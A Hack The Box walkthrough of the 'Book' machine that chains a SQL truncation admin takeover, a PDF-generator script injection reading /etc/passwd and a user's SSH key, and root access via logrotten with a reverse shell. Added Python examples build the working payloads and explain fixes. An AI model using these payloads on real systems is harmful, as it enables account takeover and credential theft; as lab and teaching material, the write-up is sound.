Book Walkthrough (Hack The Box)

Akshit Singhal
6 min read · Jul 24, 2020

We start with an nmap scan.

As we can see, only two ports are open: 22 (SSH) and 80 (HTTP).
Before heading to port 80, add the box's IP address to your hosts file.

Let's go to port 80. It looks something like this.

We see a login page with a Sign-up link on the right. Clicking Sign-up lets us register a new user.

We sign up with a random username and email, and the account is created successfully.
After signing in with these credentials, we explore the site.

Under Contact Us we find the admin's email address.
Now that we have the admin's email, maybe we can sign up using it?

Let's try signing up with username admin and email blackmonster7@book.htb.
No error is returned, which suggests the registration as user admin went through. But when we try to log in with the same credentials, it fails and shows something like this.

Trying again with email bm7@book.htb and username admin succeeds, and we can log in with these credentials. In the View Profile section, however, our role is still user.

It's odd that blackmonster7@book.htb failed while bm7@book.htb worked. To find out why, we look at the page source, and while analysing it I found something interesting in a script.

It says the email field must not contain more than 20 characters, and blackmonster7@book.htb is 22 characters long. The likely explanation is that the server stored only the first 20 characters (blackmonster7@book.h), so the full 22-character email we typed at login no longer matched the stored row. That's why it didn't work.

Googling this issue led me to a good article describing it: what we can try here is a SQL truncation attack. I'm sharing the link with you; go and read all about SQL truncation before continuing.

With that in mind, we try to sign up with admin@book.htb followed by six spaces (bringing it to exactly 20 characters) plus one more character as the 21st. The form refuses it and marks the email field red, which looks like client-side validation rather than a server error. So we send the request through Burp Suite instead, URL-encoding the spaces as %20, and the server answers 302 Found, which means the registration went through.
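To make the mechanism concrete, here is an added example (not code from the original post or from the box) that builds the padded email and the URL-encoded POST body, and models what a non-strict MySQL server does with it. The column width of 20, the form field names name/email/password, and the assumption that the email column is a VARCHAR(20) on a server without STRICT_TRANS_TABLES are all assumptions made for the example.

```python
from urllib.parse import urlencode, quote

# Assumption: the sign-up form's 20-character limit mirrors a VARCHAR(20)
# email column on the server, and MySQL is not running in strict mode.
EMAIL_COLUMN_WIDTH = 20


def build_truncation_email(target_email, width=EMAIL_COLUMN_WIDTH):
    """Pad the victim's address with spaces up to the column width and append
    one extra character. The extra character makes the submitted value differ
    from the existing row, so the duplicate-email check passes, while the
    INSERT silently truncates it back to the padded victim address."""
    if len(target_email) >= width:
        raise ValueError("target email must be shorter than the column width")
    return target_email.ljust(width) + "x"


def form_body(name, email, password):
    """URL-encode the POST body the way Burp's encoder does (spaces as %20).
    The field names name/email/password are assumptions, not the box's real ones."""
    return urlencode({"name": name, "email": email, "password": password}, quote_via=quote)


class LegacyMySQLUsers:
    """Toy model of the users table on a non-strict MySQL server:
    over-long VARCHAR values are truncated with a warning instead of an error,
    and equality under a PAD SPACE collation ignores trailing spaces.
    Passwords are kept in plaintext only to keep the model short."""

    def __init__(self, width=EMAIL_COLUMN_WIDTH):
        self.width = width
        self.rows = []

    @staticmethod
    def _pad_space_equal(a, b):
        # 'admin@book.htb      ' == 'admin@book.htb' under a PAD SPACE collation
        return a.rstrip(" ") == b.rstrip(" ")

    def signup(self, name, email, password):
        # The duplicate check runs against the untruncated submitted value:
        # 'admin@book.htb      x' does not equal the stored 'admin@book.htb'.
        for row in self.rows:
            if self._pad_space_equal(row["email"], email):
                return False  # "email already registered"
        # Non-strict INSERT: the value is cut to the column width.
        self.rows.append({"name": name, "email": email[: self.width], "password": password})
        return True

    def login(self, email, password):
        # SELECT * FROM users WHERE email = ? AND password = ?
        # The truncated row compares equal to the plain admin address, so the
        # attacker's password now authenticates as admin@book.htb.
        for row in self.rows:
            if self._pad_space_equal(row["email"], email) and row["password"] == password:
                return row
        return None


if __name__ == "__main__":
    db = LegacyMySQLUsers()
    db.signup("admin", "admin@book.htb", "real-admin-password")
    crafted = build_truncation_email("admin@book.htb")
    print("submit:", form_body("admin", crafted, "attacker-pw"))
    print("registered:", db.signup("admin", crafted, "attacker-pw"))
    print("login as admin with attacker-pw:", db.login("admin@book.htb", "attacker-pw"))
```

The same model also reproduces the earlier failure: a 22-character address is stored as its first 20 characters, so logging in with the full address no longer matches. The fix on the application side is to run MySQL in strict mode (so the INSERT errors instead of truncating) and to enforce the same length limit on the server, not only in the browser.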

Logging in with these credentials works. Checking our role, we are still a user, but the profile now shows the admin's email.

So what are we doing wrong?

We run gobuster against the site to find anything new, and it turns up a directory named admin.

Going there, we see the same login page, this time for admins, so we try our credentials on it.
And yippee, success: we are logged in as admin, with the admin role.

We now have two sessions, one as admin and one as a normal user.
Enumerating both, we find a Collections page in our bm7 user session where we can submit a book, so we submit one.

After submitting it, we go to the admin page, which has the same Collections page, except that here it offers two PDFs.

Opening the Collection PDF, we see the book we just submitted listed in it.

So whatever we type into the Author and Title fields when submitting a book as bm7 ends up in the PDF served on the admin page.

That's interesting: our input is rendered into a document generated on the server, which suggests an XSS attack against the PDF generator itself.
I found a useful post on this via Google, which I'm linking below.

Following that post, we submit the XSS payload that includes the local file /etc/passwd.

After submitting it, we go to the admin page and open the PDF under Collections. The contents of /etc/passwd are clearly visible in the PDF.
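The following added example (not code from the original post or from the box) shows the classic payload behind this step and the rendering bug that makes it work. HTML-to-PDF converters that drive a headless browser execute any script in the document while rendering it, and that script can read local files over file:// and write them into the page. The template functions are an assumption about how the collection PDF is built; the box's real code is not shown on the page.

```python
import html


def pdf_lfi_payload(path="/etc/passwd"):
    """Classic payload against HTML-to-PDF converters: the script runs inside
    the converter's headless browser, fetches a local file over file:// and
    writes it into the page, so the file contents end up in the PDF."""
    return (
        "<script>"
        "x=new XMLHttpRequest;"
        "x.onload=function(){document.write(this.responseText)};"
        "x.open('GET','file://" + path + "');x.send();"
        "</script>"
    )


def render_row_vulnerable(title, author):
    # Assumed template: user input concatenated straight into the HTML that
    # is handed to the PDF converter, which is what lets the payload execute.
    return "<tr><td>" + title + "</td><td>" + author + "</td></tr>"


def render_row_hardened(title, author):
    # Same template with the fix: HTML-escape untrusted fields before they
    # reach the converter, so '<script>' arrives as text, not as markup.
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(title, quote=True),
        html.escape(author, quote=True),
    )


def contains_script(rendered):
    """True if the rendered HTML still carries an unescaped script tag."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    payload = pdf_lfi_payload("/home/reader/.ssh/id_rsa")
    print("vulnerable:", render_row_vulnerable(payload, "bm7"))
    print("hardened:  ", render_row_hardened(payload, "bm7"))
```

Escaping is the primary fix; as a second layer the converter should run with local file access disabled (wkhtmltopdf, for example, has a --disable-local-file-access option), so that even a script that does execute cannot read files off the server.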

That's awesome! There is only one regular user here, reader. We can grab reader's SSH key the same way, by reading the file /home/reader/.ssh/id_rsa.

And hurrah! We have reader's id_rsa. The key is cut off at the right edge of the PDF, though, so to recover the whole thing you can either convert the PDF to HTML on Kali or transfer it to a Windows machine and read it there; it's your choice.

I'm using pdftohtml on Kali: pdftohtml <filename>
Opening the resulting HTML shows the whole key. Copy it into a file, restrict its permissions to 0600 (ssh refuses a private key readable by others), and log in over SSH as reader.

We now have an SSH session as reader with this key and can grab the user flag.

We notice a backups directory in reader's home. Looking through it, nothing in it seems interesting on its own, so we run LinPEAS to look for privilege escalation vectors.
LinPEAS flags /home/reader/backups/access.log: the log file lives in that writable backups directory we just looked at, and the finding is listed under the heading logrotten.

Some googling about logrotten and the privilege escalation technique behind it turns up a logrotten exploit on Exploit-DB. The idea is that logrotate runs as root and rotates a log inside a directory we can write to; logrotten waits for the rotation and swaps the directory for a symlink, so the freshly created log file, with our content, is written to a location of our choosing. I download the exploit and run it on the target.

Compile it with gcc and run the binary without arguments; it prints its usage. We also need a payload file containing our reverse shell, like this:

Then run it as shown below and listen on the port used in the payload:

And boom, we get a reverse shell as root.
